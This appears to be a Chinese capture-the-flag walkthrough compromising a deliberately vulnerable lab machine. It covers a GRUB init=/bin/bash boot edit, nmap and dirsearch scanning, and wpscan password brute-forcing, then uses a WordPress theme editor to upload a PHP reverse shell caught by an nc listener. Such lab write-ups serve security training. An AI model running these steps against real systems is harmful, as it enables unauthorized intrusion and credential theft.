修改网卡配置信息

首先kali终端运行以下命令查看靶机ip

这里我们发现并没有查到靶机的ip，这时我们重启靶机

打开靶机，按下e键，进入到如下界面

将ro替换为rw signie init=/bin/bash

替换完毕后，按下Ctrl键+X键，进入如下页面

输入vi /etc/network/interfaces编辑网卡信息,改完后按shift+？键才能输出保存，修改完成后重启靶机即可

然后来到kali终端，扫描主机发现靶机ip

arp-scan -l

浏览器访问此ip

查看页面源代码，发现没有可利用信息

使用nmap工具扫描靶机开放端口、服务版本以及系统版本，得到开放端口21、22、80及其服务ftp、ssh、http

nmap -sV -O 靶机地址
-sV        探测主机服务版本
-O         识别主机操作系统

访问ftp，利用匿名用户登录（用户名为ftp或anonymous，密码为空），查看后发现一个secret.jpg图片

将图片下载到本地进行查看分析，也没有找到什么有用的信息

使用工具对网站目录进行扫描，获得/blog和/blog/wp-login.php文件

dirsearch -u 靶机URL
-u        指定目标URLdirb 靶机url

在访问/blog时，点击跳转按钮，多次跳转到driftingblues.box域名下的地址

猜测可能需要使用域名进行访问，更改hosts文件

再次登录/blog/wp-login.php网页，获得登录页面

尝试使用 wpscan 工具对登录使用的用户名和密码进行爆破，获得用户名/密码（albert/scotland1）

wpscan --url http://driftingblues.box/blog --enumerate u
--url                        目标URL
--enumerate           enumerate参数指定u，枚举站点用户名

wpscan --url http://driftingblues.box/blog/ -P /usr/share/wordlists/rockyou.txt --usernames albert
-P                        指定密码字典
--usernames       指定用户名
/usr/share/wordists/rockyou.txt 是kali系统自带的密码文件，默认是个压缩包需要自行解压

将php reverse shell的代码写入替换Theme File Editor中的404.php模版，如果可以update file成功，就可以获取目标主机的shell

使用刚才爆破获得的用户名/密码登录网站，进入管理系统内，到Theme File Editor页面，选择404.php模版进入网页内

在kali中打开nc监听

nc -lvp 监听端口号 靶机地址
-l             开启监听
-v            显示详细输出
-p            指定监听端口

将php reverse shell的代码写入到404.php模版中，点击Update File按钮

在kali中访问靶机网站中一个不存在的页面，成功反弹shell